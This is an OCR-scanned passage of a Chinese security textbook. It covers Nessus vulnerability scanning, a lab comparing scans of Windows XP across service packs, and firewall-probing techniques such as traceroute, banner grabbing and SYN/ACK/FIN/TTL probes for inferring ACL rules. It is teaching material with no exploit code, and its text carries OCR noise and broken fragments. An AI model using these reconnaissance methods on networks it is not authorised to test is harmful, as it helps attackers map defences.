当前 的 漏洞 扫描 技术 主要 是 基于 特征 匹配 原理 ,一 些 漏 洞 扫描 器 通过 检测 目标 主机 不 
同 的 端口 开放 的 服务 ,记录 其 应 答 , 然 后 与 漏洞 库 进行 比较 ,如 果 满 足 匹配 条 件 , 则 认为 存在 
安全 漏洞 。 所 以 在 漏洞 扫描 中 ,漏洞 库 的 定义 精确 与 否 直接 影响 最 后 的 扫描 结果 。 

功能 齐全 的 扫描 器 具有 安全 性 能 评估 分 析 系统 ,并 能 对 安全 漏洞 给 出 修补 建议 。 而 有 
的 扫描 器 允许 用 户 自 定义 扫描 ,例如 一 些 扫描 器 允许 用 户 自 己 添加 扫描 规则 。 在 扫描 器 的 
设计 中 ,漏洞 扫描 器 的 设计 趋势 是 插件 化 ,添加 新 的 插件 就 能 扫描 新 的 漏洞 。 漏 洞 扫 描 技 术 
对 扫描 后 的 评估 重要 性 日 益 显现 ,下 一 代 的 漏洞 扫描 系统 不 但 能 够 扫描 安全 漏洞 ,还 能 够 智 
能 化 地 评估 网 络 的 安全 状况 并 给 出 安全 建议 。 

在 漏洞 扫描 领域 ,Nessus 是 一 个 功能 强大 而 又 易于 使 用 的 远程 安全 扫描 器 ,提供 完整 
的 计算 机 漏洞 扫描 服务 。 不 同 于 传统 的 漏洞 扫描 软件 ,Nessus 可 同时 在 本 机 或 远 端 上 遥 
控 , 进 行 系统 的 漏洞 分 析 扫 描 , 并 随时 更 新 其 漏洞 数据 库 。Nessus 系统 为 客户 /服务 器 模式 
(图 2-9) ,服务 器 端 负 责 进行 安全 检查 .客户 端 用 来 配置 管理 服务 器 端 。 客 户 端 提供 了 运行 
在 Windows 环境 的 图 形 界 面 ,接受 用 户 的 命令 与 服务 器 通信 ,传送 用 户 的 扫描 请 求 给 服务 
器 端 , 由 服务 器 启动 扫描 并 将 扫描 结果 呈现 给 用 户 , 扫 描 代 码 与 漏洞 数据 相互 独立 。 
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Nessus 针对 每 一 个 漏洞 有 一 个 对 应 的 插件 ,漏洞 插件 是 用 NASL(Nessus Attack Scripting 
Language, 由 Tenable 所 开发 出 的 语言 ,用 来 写 人 Nessus 的 安全 测试 选项 ) 编 写 的 一 小 段 模 
拟 攻击 漏洞 的 代码 ,这 种 利用 漏洞 插件 的 扫描 技术 极 大 地 方便 了 漏洞 数据 的 维护 、 更 新 。 
Nessus 具有 扫描 任意 端口 任意 服务 的 能 力 , 并 以 用 户 指定 的 格式 (ASCII 文本 、HTML 等 ) 
产生 详细 的 输出 报告 ,包括 目标 的 脆弱 点 、 怎 样 修补 漏洞 以 防止 黑客 入 侵 及 危险 级 别 。 


Nessus 服 务 器 


已 一 一 


Nessus 客 户 端 


图 2-9 Nessus 应 用 拓扑 


Nessus 根据 已 知 的 系统 漏洞 和 弱点 ,对 被 评估 的 系统 进行 模拟 攻击 ,最 后 给 出 一 份 详 
细 的 报告 。Nessus 将 系统 的 漏洞 归结 为 3 类 : 

。 Security Holes: 该 项 攻击 成 功 并 且 会 造成 极 大 的 安全 风险 。 

。 Security Warnings: 该 项 攻击 成 功 ,但 是 不 会 对 安全 造成 大 的 影响 。 

。 Security Notes: 软件 通过 扫描 发 现 了 系统 相关 信息 。 

Nessus 还 会 将 这 3 类 漏洞 依据 风险 因素 分 解 为 不 同等 级 : 

。 Critical: 已 经 威胁 到 远 端 主 机 的 安全 。 

。 Serious: 该 漏洞 泄露 的 信息 可 以 被 黑客 利用 进行 攻击 。 

。 High: 黑客 可 以 在 远 端 主机 获取 shell ,或 者 执行 任意 命令 。 

。 Medium: 该 安全 漏洞 可 以 导致 用 户 权 限 扩大 。 

。 Low: 从 该 漏洞 获取 的 信息 可 以 被 黑客 利用 ,但 是 不 会 立刻 造成 严重 威胁 。 

。 None: 系统 不 存在 隐患 。 

Nessus 报告 的 漏洞 可 能 包含 多 个 等 级 的 风险 因素 ,需要 判断 每 个 漏洞 最 有 可 能 实现 的 
风险 等 级 。 对 于 每 个 被 发 现 的 漏洞 ,Nessus 都 会 有 一 个 BugTraq ID(CBID) 列 表 链 接 、 一 个 
公共 漏洞 和 暴露 (CVE) 代 码 链接 和 一 个 Nessus ID。 这 3 个 参考 链接 中 的 任意 一 个 ,都 可 
以 帮助 更 进一步 了 解 该 漏洞 的 潜在 危害 。 通 过 分 析 Nessus 的 评估 报告 来 判断 系统 漏洞 是 
否 会 对 系统 造成 影响 ,是 一 个 非常 重要 的 举措 。 

实验 2-4 利用 Nessus 漏洞 扫描 评估 Windows XP 系统 

【实验 目的 】 

(1) 利用 Nessus 评估 Windows XP 系统 (专业 版 ) 的 安全 风险 。 

(2) 认识 安全 补丁 与 系统 风险 的 关系 。 
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【实验 准备 】 

(1) 在 主机 上 安装 漏洞 扫描 工具 Nessus( 官 方 网 站 http://www. nessus. org)。 

(2) 在 扫描 机 (实体 机 或 虚拟 机 ) 上 安装 未 打 补 丁 的 Windows XP 专业 版 。 

(3) 下 载 Windows XP 专业 版 补丁 包 (Windows XP Service Pack): SP1 .SP2 .SP3 。 

注意 : 实验 时 先行 安装 未 打 补 丁 的 Windows XP, 获 取 扫 描 文 件 后 再 依次 安装 补丁 包 。 

【实验 过 程 】 

(1) 打开 Nessus Client 对 Windows XP 系统 进行 扫描 ,并 保存 扫描 结果 为 sp. htm 
文科 

(2) 安装 SP1 补丁 包 , 再 对 系统 进行 扫描 ,并 保存 扫描 结果 为 spl. htm 文件 。 

(3) 安装 SP2 补丁 包 , 再 对 系统 进行 扫描 ,并 保存 扫描 结果 为 sp2. htm 文件 。 

(4) 安装 SP3 补丁 包 , 再 对 系统 进行 扫描 ,并 保存 扫描 结果 为 sp3. htm 文件 。 

【实验 分 析 】 

(1) 打开 扫描 文件 ,仔细 阅读 并 加 以 分 析 对 比 , 提 取 重 要 的 特征 数据 。 

将 保存 的 Nessus 扫描 文件 依次 用 浏览 器 打开 ,查看 Nessus 的 详细 扫描 报告 ,包括 扫描 
时 间 、 主 机 信息 、 开 放 端 口 及 漏洞 个 数 、 各 开放 端口 具体 的 漏洞 及 危害 。 

(2) 扫描 数据 分 析 。 

依据 分 析 结 果 , 填 写 表格 。 

@ 扫描 时 间 ( 表 2-8)。 


表 2-8 扫描 时 间 
版 本 Start time End time Scan Time 
原版 
SP1 


SP2 


SP3 


@ 主机 信息 ( 表 2-9)。 
表 2-9 主机 信息 
版 本 操作 系统 NetBIOS 名 DNS 名 
原版 
SP1 


SP2 


SP3 


@ 开放 端口 及 漏洞 个 数 ( 表 2-10) 。 
表 头 中 High、Medium 、Low 属于 评定 的 漏洞 等 级 ,采用 的 是 Nessus 标准 。 
根据 等 级 评定 ,可 以 得 出 表 2-11。 


。75。 


表 2-10 端口 及 漏洞 个 数 


版 本 Open Port High Medium Low 
原版 
SP1 
SP2 
SP3 
表 2-11 等 级 评定 
版 本 开放 端口 Critical High Medium Low None 
原版 
SP1 
SP2 
SP3 


由 表 2-11 可 以 制作 出 Windows XP 各 版 本 漏洞 数 的 折线 图 (请 读者 根据 图 2-10 的 图 
例 自行 画 出 ) ,并 分 析 图 中 Critical、High 的 漏洞 与 补丁 更 新 的 关系 ,可 以 得 出 什么 结论 ? 


二 XP 各 版 本 漏洞 数 
一 -一 Critical 
35 一 。 High 
30 一 一 Medium 
25 一 国 一 Lov 
ER — 
蚂 20 None 
坚 
15 
10 
5 
0 
原版 SP1 SP2 SP3 
版 本 号 
图 2-10 漏洞 数 的 折线 图 
【系统 评估 】 


经 过 以 上 分 析 , 可 以 制定 公式 来 粗略 评定 各 版 本 系统 的 分 数 , 从 而 得 出 各 版 本 的 安全 系 
数 。 将 Critical 与 High 的 漏洞 归 为 High 的 漏洞 ( 即 High 与 High 以 上 的 归 为 High) ,而 
Low 与 None 的 漏洞 归 为 Low( 即 Low 与 Low 以 下 的 归 为 Low)。 因 此 以 Medium 为 中 位 
数 , 定 为 3.5 分, 则 High 与 Low 分 别 与 之 相差 2 分 ,分别 为 5.5、1.5; 而 Critical 与 High、 
Low 和 None 相差 少 一 点 ,相差 1. 5 分 。 由 此 设 定 计 算 公 式 为 : 
100 一 Critical X7— High X 5.5— Medium X3.5— LowX1.5— None X0 
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据 此 画 出 柱状 图 (请 读者 根据 图 2-11 自行 画 出 ), 满 分 为 100, 分 数 越 高 表示 系统 越 
安全 。 


统 得 分 


版 本 号 
图 2-11 系统 得 分 柱状 图 


最 终 将 得 出 的 分 数 填 人 表 2-12。 


表 2-12 得 分 表 
原版 SP1 SP2 SP3 平均 分 


【系统 漏洞 与 补丁 分 析 】 
下 面 的 数据 与 读者 实际 得 到 的 可 能 存在 差异 ,只 起 示例 作用 。 
(1) 原版 -SP1 修补 的 漏洞 ( 表 2-13) 。 

表 2-13 SP1 修补 的 漏洞 


漏洞 等 级 漏 洞 简略 描述 
MS04-012 RPC/DCOM 中 的 执行 漏洞 .远程 执行 代码 
MS09-001 SMB 漏洞 拒绝 服务 
MS06-035 “服务 器 ”服务 缺陷 ,获得 远程 主机 内 存 部 分 
High MS05-043 后 台 处 理 程序 服务 缺陷 ,远程 执行 代码 
MS06-025 路 由 和 远程 访问 服务 由 于 内 存 损坏 漏洞 影响 远程 执行 代码 
MS03-030 漏洞 可 能 允许 攻击 者 执行 任意 代码 并 获得 系统 权限 (冲击 波 或 LoveSan 
蠕虫 ) 
MS05-027 由 于 SMB 实施 的 缺陷 使 得 可 以 在 远程 主机 上 执行 任意 代码 
Medium MS05-007 可 以 由 匿名 用 户 身 份 得 到 关于 远程 主机 的 系统 信息 
Ses | 可 以 列举 远程 网 络 共享 
SMB Registry | Nessus 无 法 访问 远程 Windows 注册 表 


由 表 2-13 可 以 看 出 ,SP1 主要 修复 了 远程 主机 能 执行 任意 代码 的 漏洞 以 及 冲击 波 或 
LoveSan 蠕虫 的 攻击 。 
(2) SP1-SP2 修补 的 漏洞 ( 表 2-14) 。 


wy 全 


表 2-14 SP1-SP2 修补 的 漏洞 


漏洞 等 级 漏 洞 简略 描述 

MS08-067 服务 器 的 服务 缓冲 区 溢出 ,执行 代码 
MS04-022 强制 本 地 用 户 安装 文件 或 浏览 病毒 网 站 远程 执行 代码 
MS06-040 服务 器 的 服务 缓冲 区 溢出 ,执行 代码 

High | MS06-035 服务 器 的 服务 缓冲 区 溢出 且 在 SMB 信息 泄露 漏洞 执行 代码 
MS04-007 攻击 者 发 送 一 个 ASN. 1 编码 ,远程 执行 代码 
MS04-011 LSASS 服务 漏洞 远程 执行 代码 
MS03-026 蠕虫 (冲击 波 ) 系 列 利用 此 漏洞 ,远程 执行 代码 
Open Port Re-check | 开放 的 端口 关闭 
DCE Services a a 

远程 主机 上 运行 DCE / RPC 服务 Port dce-rpe (1025/tcp) 
Enumeration 
edi 。 当 它 收 到 HTTP 请 求 , 通 过 标题 或 错误 消息 查 明 远 程 服务 Port dce- 
Service Detection 
rpc (1025/tep) 

DES 远程 主机 上 运行 DCE / RPC 服务 Port dce-rpe (1026/tcp) 
Enumeration 
Service Detection 远程 主机 上 运行 DCE / RPC 服务 Port epmap (135/tcp) 
DoE SOG 远程 主机 上 运行 DCE / RPC 服务 Port cifs (445/tcp) 

Low Enumeration 


SMB Registry 


Nessus 无 法 访问 远程 Windows 注册 表 


UPnP TCP Helper 
Detection 


远程 主机 正在 运行 微软 UPnP 的 TCP 助手 


A 3 当 它 收 到 HTTP 请 求 ,通过 标题 或 错误 消息 查 明 远程 服务 Port 
Service Detection 2 
www (5000/tcp) 
HyperText Transfer 
Protocol (HTTP) 远程 HTTP 配置 信息 可 以 被 提取 
Information 
Broken Web Servers | Web 服务 器 上 的 测试 已 被 禁用 
由 表 2-14 发 现 ,SP1 已 经 修复 此 漏洞 ,但 在 SP2 又 出 现 此 漏洞 。 这 种 情况 表明 : 全 而 


是 不 可 能 完全 被 修复 的 。 有 的 时 候 虽 然 修 复 了 一 个 漏洞 , 另 一 个 漏洞 也 可 能 出 现 。SP2 主 
要 修复 了 服务 缓冲 区 溢出 ,蠕虫 (冲击 波 )、. 远 程 主机 上 运 


Windows XP 系统 趋 于 完善 。 
(3) SP2-SP3 修补 的 漏洞 ( 表 2-15) 。 
由 表 2-15 可 知 ,SP3 修复 了 服务 缓冲 区 溢出 漏洞 ,而 Service Detection 不 属于 真正 意义 
上 的 漏洞 ,属于 服务 检测 ,对 系统 不 造成 严重 影响 ,因此 出 现在 不 同 的 端口 。 可 见 , Windows 
XP 系统 得 到 一 系列 的 修补 后 进一步 趋 于 完善 。 
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运行 DCE / RPC 服务 等 漏洞 。 可 见 ， 


表 2-15 SP2-SP3 修补 的 漏洞 
漏洞 等 级 漏 洞 简略 描述 
High MS06-035 服务 器 的 服务 缓冲 区 溢出 且 在 SMB 信息 泄露 漏洞 执行 代码 
当 它 收 到 HTTP 请 求 , 通 过 标题 或 错误 消息 查 明 远 程 服务 Port dce-rpe 
(1025/tcp) 
当 它 收 到 HTTP 请 求 ,通过 标题 或 错误 消息 查 明 远程 服务 Port dce-rpe 
(1026/tcp) 


Service Detection 


Service Detection 


【实验 总 结 】 

通过 对 4 个 版 本 的 扫描 以 及 对 扫描 报告 的 分 析 , 可 以 得 出 以 下 结论 : 每 打 一 个 补丁 包 ， 
Windows XP 系统 就 更 加 完善 ,修补 了 一 系列 的 漏洞 ,降低 了 系统 风险 ,尤其 是 冲击 波 或 
LoveSan 蠕虫 的 攻击 、 服 务 缓冲 区 溢出 漏洞 等 高 危 漏洞 和 DCE Services Enumeration 等 低 
风险 漏洞 。 

在 SP3 系统 上 安装 一 般 的 修复 漏洞 软件 ,如 鲁 大 师 。 修 复 后 再 用 Nessus 扫描 仍然 有 
漏洞 ,这 说 明 那 些 其 实 不 算是 漏洞 ,只 是 某 种 服务 。 

综 上 所 述 , Windows XP 原版 系统 .SP1、SP2、SP3, 随 着 补丁 一 一 被 打上 ,系统 趋 于 安 
全 。 虽 然 SP3 仍然 存在 着 漏洞 ,可 以 通过 360 安全 卫士 .和 鲁 大 师 等 修复 部 分 漏洞 ,但 不 能 完 
全 修复 ,部 分 漏洞 仍然 存在 。 这 说 明 有 些 根本 不 是 漏洞 ,只 是 服务 检测 ,对 系统 不 会 造成 严 
重 影响 ,可 以 看 作 是 没有 漏洞 。 漏 洞 永远 也 不 可 能 修补 完 , 有 可 能 拆 东 墙 补 西 墙 ,引起 更 多 
的 漏洞 。 

【实验 思考 】 

(1) Nessus 扫描 时 ,所 谓 漏洞 是 如 何 认 定 的 ? 所 依据 的 漏洞 库 如 何 形成 ? 

(2) 仿照 本 例 , 扫 描 Windows 7、Windows 7 SP1, 并 进行 类 似 的 分 析 。 


2.1.5 防火 墙 探 测 


防火 墙 被 用 来 保障 网 络 的 安全 ,攻击 者 在 有 防火 墙 的 情况 下 ,一 般 是 很 难 入 侵 的 。 防 火 
墙 探测 就 是 利用 路 由 追踪 .端口 扫描 、 旗 标 搜 取 等 方法 对 防火 墙 的 相关 信息 进行 探测 ,通过 
发 送 特定 的 包 给 防火 墙 后 面 的 主机 , 诱 使 被 探测 的 目标 主机 返回 数据 包 , 然 后 对 这 些 进行 数 
据 分 析 , 从 而 获得 防火 墙 相关 信息 ,如 图 2-12 所 示 。 

防火 墙 探测 技术 主要 有 防火 墙 存在 性 探测 、 防 火 墙 类 型 探测 ,防火墙 规则 探测 和 防火 墙 
后 主机 探测 。 通 过 探测 ,明确 目标 主机 前 是 否 存在 防火 墙 、 防 火 墙 的 类 型 .设置 的 ACL 规 
则 以 及 是 否 可 以 穿 透 , 同 时 探测 位 于 其 后 的 主机 的 信息 。 

1. 防火 墙 的 存在 性 探测 

在 主机 扫描 时 ,通常 使 用 ping 工具 。 若 ping 一 台 主 机 收 不 到 其 回应 ,有 两 种 可 能 : 主 
机 不 在 线 或 ICMP 包 被 防火 墙 过 滤 了 。 防 火 墙 一般 会 阻止 ICMP 包 ,如 果 要 进一步 判断 是 
否 有 防火 墙 , 就 不 能 采用 ICMP 包 , 这 时 可 改 用 其 他 方式 (如 UDP 包 ), 并 使 用 路 由 跟踪 的 
方法 ， 

众所周知 ,tracert 是 Windows 下 的 路 由 跟踪 命令 ,但 tracert 是 向 目的 地 址 发 出 ICMP 
请 求 回 显 数据 包 。 而 另 一 个 路 由 跟踪 工具 traceroute(Linux/BSD/Router 下 的 工具 ) .默认 

a Yq % 


同 


探测 包 


扫描 机 


图 2-12 防火 墙 探测 


情况 下 是 向 目的 地 址 的 某 个 端口 (大 于 30000) 发 送 UDP 数据 报 。 当 然 , 如 果 防 火 墙 也 阻止 
UDP 包 通 过 ,这 种 探测 也 不 能 有 正确 的 结果 。 

通过 traceroute 可 以 跟踪 数据 包 在 到 达 目 标 主 机 的 路 径 中 所 经 过 的 主机 、 路 由 器 ,从 而 
可 以 猜测 并 判断 出 防火 墙 的 位 置 。 一 般 情 况 下 ,使 用 traceroute 对 目标 主机 进行 跟踪 会 有 
两 种 情况 : 得 到 到 达 目 标 主机 完整 的 各 跳 路 由 ; @ 只 得 到 开始 的 部 分 路 由 ,其 他 的 被 过 
滤 了 。 

对 于 前 一 种 情况 ,可 以 认为 在 到 达 目 标 主 机 之 前 的 最 后 一 跳 是 防火 墙 的 可 能 性 很 大 。 
而 对 于 后 一 种 情况 ,由 于 最 后 一 跳 之 后 的 数据 包 都 被 拦截 了 ,因而 可 以 判定 最 后 一 跳 或 者 是 
防火 墙 ,或 者 是 路 径 上 阻塞 路 径 跟踪 数据 包 的 路 由 器 。 综 合 这 两 种 情况 ,最 后 一 跳 是 防火 墙 
的 可 能 性 都 很 大 。 

下 面 是 使 用 traceroute 得 出 的 两 组 探测 数据 ,第 1 组 符合 第 中 种 情况 ,第 2 组 符合 第 @ 

#traceroute 172.16.3.18 

Traceroute to 172.16.3.18 (172.16.3.18),30 hops max 38 byte Packets 

1 172.16.1.6 (172.16.2.6) 0.333 0.330 0.311 

2 172.16.0.254 (172.16.0.254) 2.234 1.222 1.256 

3172.16.3.18 (172.16.3.18) 2.678 3.022 2.789 

#traceroute 172.16.10.18 

Traceroute to 172.16.10.18(172.16.10.18),30 hops max, 38 byte packets 


1 172.16,3.6 (172.16.3.6) 1.333 1.330 1,311 
2172,.16.5.1 (172.16.5.1) 3.234 2.222 3.256 
3 ¥ x 
4#* x x 
5 关 关 x 


对 于 第 1 组 数据 ,估计 172. 16. 0. 254 是 防火 墙 。 对 于 第 2 组 数据 ,172. 16. 5. 1 可 能 是 
目标 主机 前 的 防火 墙 。 虽 然 以 上 的 结论 不 能 完全 肯定 ,但 是 判断 为 防火 墙 的 可 能 性 非常 大 。 

有 经 验 者 总 结 , 在 telnet 远程 主机 端口 时 ,如 果 很 快 返 回 连接 失败 ,就 说 明 端 口 关 闭 ; 如 
本 :了 


果 等 了 十 多 秒 才 返回 ,可 能 是 对 方 装 有 防火 墙 。 读 者 不 妨 尝试 一 下 。 

2. 防火 墙 类 型 探测 

防火 墙 的 类 型 测试 就 是 要 探测 出 该 防火 墙 的 类 型 .型 号 、 所 提供 的 功能 。 很 多 防火 墙 都 
有 不 同 于 其 他 防火 墙 的 特征 标识 ,这 就 为 防火 墙 的 类 型 探测 提供 了 依据 。 例 如 ,连接 防火 墙 
的 某 些 端 口 会 返回 一 些 特殊 信息 , 像 序 号 、 旗 标 (banner) 等 ,可 以 利用 这 些 特征 对 潜在 防火 
墙 进行 识别 。 防 火 墙 的 特征 标识 一 般 有 3 种 。 

1) 默认 监听 端口 

防火 墙 为 了 方便 管理 控制 ,会 打开 默认 的 端口 监听 。 例 如 CheckPoint 的 FireWall-l1 防 
火 墙 默认 监听 TCP 的 256 一 259 端口 ,微软 的 Proxy Server 会 监听 TCP 的 1745 和 1080 端 
口 , 而 NetScreen 防火 墙 默认 监听 的 是 80 端口 。 利 用 这 一 特征 也 可 以 判断 目标 是 不 是 防火 
墙 . 是 何 品牌 的 防火 墙 。 

2) 特征 序号 

特征 序号 也 是 一 种 判别 依据 。 某 些 防 火 墙 有 独特 的 显示 为 一 系列 数字 的 足迹 ,能 够 与 
其 他 防火 墙 区 别 开 来 。 当 连接 防火 墙 的 某 些 端口 时 ,有 的 防火 墙 的 端口 会 返回 一 个 特征 序 
号 ,由 此 可 判断 出 部 分 防火 墙 的 类 型 和 版 本 。 

3) 旗 标 

旗 标 也 是 防火 墙 特征 的 一 种 , 它 是 连接 防火 墙 某 一 端口 后 得 到 的 特殊 的 返回 信息 。 某 
些 代 理性 质 的 防火 墙 会 声明 其 是 防火 墙 的 功能 ,有 的 还 公布 防火 墙 的 类 型 和 版 本 。 

3. 防火 墙 规则 探测 

防火 墙 规则 是 防火 墙 系统 一 个 重要 的 组 成 部 分 , 它 直接 地 决定 了 防火 墙 的 性 能 。ACL 
是 执行 安全 策略 的 一 套 防 火 墙 规则 ,是 防火 墙 的 安全 控制 核心 , 它 规定 防火 墙 开放 哪些 端 
口 ,允许 哪些 类 型 的 包 通 过 。 掌 握 了 ACL ,就 能 更 准确 地 对 防火 墙 后 面 的 网 络 进行 探测 。 
探测 防火 墙 的 规则 就 是 要 知道 防火 墙 允许 什么 样 的 数据 包 通 过 。 

一 般 而 言 , 包 过 滤 防 火 墙 检查 的 是 网 络 层 和 传输 层 头 部 的 相关 信息 ,主要 包括 源 IP 地 
址 .目的 IP 地址、 协议 类 型 . 源 端口 、 目 的 端口 。 进 行 防火 墙 规 则 探测 时 ,主要 构造 各 种 特殊 
的 数据 包 , 对 所 有 常用 的 TCP 和 UDP 端口 进行 探测 , 诱 使 防火 墙 返回 各 种 可 以 推测 出 其 规 
则 的 信息 ,从 而 推导 出 防火 墙 ACL 的 端口 规则 ,得 知 防 火 墙 允许 或 禁止 通过 的 数据 包 。 

1) TCP/SYN 报 文 段 探 测 

TCP/SYN 报 文 段 探测 向 位 于 防火 墙 后 的 目标 主机 发 送 TCP/SYN 报 文 段 ,在 防火 墙 
规则 的 控制 下 ,探测 机 将 收 到 不 同 的 回应 信息 ,根据 所 得 到 的 回应 报 文 段 可 以 判断 防火 墙 设 
置 的 规则 ,判断 标准 如 下 : 

(1) 如 果 防 火 墙 允许 该 数据 包 通过 ,那么 目标 主机 会 根据 端口 状态 回 送 相应 的 数据 包 : 

。 主机 端口 处 于 监听 状态 时 回 送 SYN/ACK 报 文 段 。 

。 主机 端口 处 于 关闭 状态 时 回 送 RST/ACK 报 文 段 。 

(2) 如 果 防 火 墙 拦截 了 该 数据 包 , 则 防火 墙 要 么 向 探测 机 回 送 一 个 对 方 不 允许 通信 的 
ICMP( 类 型 3, 代 码 13) 报 文 , 要 么 没有 任何 回应 信息 。 

由 此 ,防火 墙 规则 的 探测 结果 如 表 2-16 所 示 。 


作坊 和 光 


表 2-16 TCP/SYN 探测 结果 分 析 


回应 数据 包 端口 状态 /防火 墙 规则 
SYN/ACK 报 文 段 允许 通过 ,端口 监听 
RST/ACK 报 文 段 允许 通过 ,端口 关闭 
ICMP( 类 型 3, 代 码 13) 报 文 不 允许 通过 
无 不 允许 通过 


探测 工具 Nmap 在 端口 扫描 时 会 显示 某 个 端口 处 于 过 滤 状态 ,就 是 利用 了 这 一 原理 。 
Nmap 一 旦 收 到 ICMP( 类 型 3, 代 码 13) 报 文 ,或 者 没有 收 到 能 反映 端口 状态 的 SYN/ACK、 
RST/ACK 报 文 段 , 则 显示 该 端口 被 防火 墙 过滤 。 

2) TTL 探测 

TTL(Time To Live, 生 存 时 间 ) 表 示 数 据 包 在 网 络 中 可 通过 的 路 由 器 数 的 最 大 值 。 
TTL 是 IP 报头 中 的 一 个 长 度 为 8 位 的 字段 。 其 初始 值 由 源 主 机 设置 ,一 旦 经 过 一 个 处 理 
它 的 路 由 器 , 它 的 值 就 减 去 1。 当 路 由 器 接收 到 TTL 值 等 于 1 或 0 的 数据 报时 ,丢弃 该 数 
据 包 ,同时 向 该 数据 报 的 源 主机 发 送 ICMP( 类 型 11 ,代码 0) 报 文 。TTL 探测 法 正 是 利用 这 
一 点 进行 防火 墙 规则 探测 的 。 
TTL 探测 法 的 工作 机 制 是 : 向 目标 主机 发 送 数据 报 ,使 得 经 过 防火 墙 时 该 数据 报 的 
工 值 等 于 1。 此 时 ,如 果 防 火 墙 允许 该 数据 报 通过 , 则 防火 墙 对 该 数据 报 进 行 转发 ,将 
二 值 减 1 变 为 0, 这 时 防火 墙 向 源 主机 回 送 ICMP( 类 型 11 ,代码 0) 报 文 ,表明 数据 报 生 
命 到 期 ;而 如 果 防 火 墙 不 允许 该 数据 报 通过 ,可 能 回 送 一 个 ICMP( 类 型 3, 代 码 13) 报 文 ( 表 
明 数 据 报 被 过 滤 了 ) ,也 可 能 没有 任何 回 送信 息 。 通 过 连续 发 送 这 种 探测 数据 报 和 分 析 监 听 
到 的 响应 ,能 够 确定 该 网 关上 的 访问 控制 列表 。 防 火 墙 规则 与 回应 数据 包 的 对 应 关系 如 
表 2-17 所 示 。 在 此 基础 上 ,这 种 技术 还 可 以 探测 出 防火 墙 后 面 的 主机 的 端口 状态 。 


表 2-17 TIL 探测 结果 分 析 


回 送 数据 包 对 应 的 防火 墙 规则 
ICMP( 类 型 11, 代 码 0) 报 文 允许 通过 
ICMP( 类 型 3, 代 码 13) 报 文 不 允许 通过 
无 不 允许 通过 


4. 防火 墙 后 主机 探测 

防火 墙 后 主机 探测 主要 是 探测 受 防火 墙 保护 的 主机 的 存活 性 和 端口 状态 ,一 般 采 用 网 
络 主 机 探测 技术 。 如 果 已 经 探测 获得 防火 墙 的 ACL 规则 , 即 已 经 知道 防火 墙 允许 哪些 端 
口 的 数据 通过 , 则 可 以 通过 这 些 已 知 的 、 允 许 通 过 的 端口 去 探测 被 防火 墙 保护 的 主机 。 

目前 主机 探测 技术 可 以 分 为 两 大 类 : 正常 数据 包 探 测 和 异常 数据 包 探测 。 

1) 正常 数据 包 探测 

正常 数据 包 探测 ,顾名思义 ,就 是 利用 合法 的 、 正 常 的 数据 包 去 探测 目标 主机 的 主机 状 
态 和 端口 开放 信息 。 这 种 探测 方法 发 送 的 数据 包 与 网 络 中 的 正常 流量 没有 区 别 , 隐 项 性 好 ， 
不 易 被 防火 墙 过 滤 。 根 据 网 络 中 常见 的 数据 包 类 型 ,可 以 将 正常 数据 包 探 测 分 为 以 下 3 种 : 
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(1) TCP 报 文 段 探测 。TCP 报 文 段 探 测 就 是 向 目标 主机 发 送 各 种 设置 了 标志 位 的 
TCP 报 文 段 ,然后 通过 分 析 对 方 的 响应 来 判断 目标 的 状态 。TCP 报 文 段 探 测 主要 有 SYN、 
ACK 和 FIN 探测 。 

Q@ SYN 报 文 段 探测 。 向 一 台 主 机 的 开放 端口 发 送 SYN 请 求 连接 报 文 段 将 会 收 到 
SYN/ACK 报 文 段 ,而 关闭 端口 回应 RST/ACK 报 文 段 , 这 都 说 明 主 机 是 存活 的 。 如 果 目 
标 主机 不 存在 或 者 已 关机 ,将 什么 回应 也 收 不 到 。 对 防火 墙 后 面 的 整个 地 址 范围 发 送 SYN 
报 文 段 ,就 能 得 到 受 保护 网 络 中 的 活动 主机 数量 和 IP 地 址 ,从 而 得 到 网 络 的 拓扑 图 。 

该 探测 方法 不 仅 可 以 探测 目标 主机 是 否 存 活 , 对 于 存活 的 目标 主机 ,还 能 探测 其 端口 的 
状态 (开放 或 者 关闭 )。 因 此 ,利用 该 探测 方法 共有 3 种 探测 结果 : 目标 主机 存活 且 端 口 打 
开 ; 目 标 主机 存活 且 端 口 关闭 ;目标 主机 不 存在 或 关机 。 

@ ACK 报 文 段 探测 。RFC793 规定 , 收 到 ACK 报 文 段 后 ,无 论 端口 打开 或 者 关闭 ,都 
返回 RST 报 文 段 。 因 此 ,可 以 向 任意 端口 发 送 ACK 报 文 段 ,只 要 有 RST 回应 ,就 说 明 主 机 
是 活动 的 。ACK 探测 不 能 判断 主机 的 端口 是 否 开放 ,而 只 能 判断 主机 的 存活 性 。 若 目标 主 
机 前 面 是 基于 状态 检测 的 防火 墙 ,ACK 报 文 段 将 被 防火 墙 过 滤 而 到 达 不 了 目标 主机 ,不 能 
收 到 RST 回应 。 这 是 因为 TCP 连接 的 3 次 握手 过 程 中 ,每 当 一 个 正常 的 SYN 连接 请 求 通 
过 状态 检测 防火 墙 , 它 都 会 在 状态 连接 表 中 记录 这 个 连接 。 而 现在 的 情况 是 ,直接 发 送 
ACK 报 文 段 而 没有 前 面 两 次 握手 的 过 程 ,防火 墙 的 状态 表 里 面 就 没有 这 个 连接 的 记录 , 因 
此 它 会 把 这 个 ACK 报 文 段 当 作 非 法 的 连接 丢弃 。 因 此 ,没有 收 到 RST 回应 并 不 说 明 目 标 
主机 不 存在 。 

@ FIN 报 文 段 探测 。FIN 报 文 段 探测 的 主要 依据 是 : 开放 的 端口 不 回应 FIN 置 位 的 
TCP 报 文 段 , 关 闭 的 端口 对 FIN 报 文 段 做 出 RST/ACK 回应 。 发 送 FIN 报 文 段 能 探测 主 
机 的 活动 性 并 判断 端口 是 否 开放 。 如 果 收 到 RST/ACK 的 回应 ,说 明 该 主机 是 活动 的 , 且 
目标 端口 关闭 。 若 未 收 到 回应 , 则 可 能 是 以 下 3 种 情况 之 一 : 主机 不 在 线 ;主机 是 活动 的 ， 
且 目 标 端口 开放 ;防火 墙 是 基于 状态 检测 的 , 它 不 允许 没有 连接 记录 的 FIN 报 文 段 通过 。 

(2) UDP 数据 报 探测 。UDP 数据 报 探测 是 向 关闭 的 端口 发 送 UDP 包 , 主 机 会 响应 一 
个 端口 不 可 达 ICMP 错误 报 文 (类 型 3, 代 码 3) ,而 开放 的 端口 则 没有 响应 。 

如 果 发 出 UDP 数据 报 后 收 到 ICMP 端口 不 可 达 报 文 , 则 说 明 目 标 主机 是 存活 的 , 且 目 
标 端 口 是 关 闭 的 ;如 果 没 有 回应 , 则 可 能 是 以 下 3 种 情况 之 一 : 主机 不 在 线 ;主机 是 活动 的 ， 
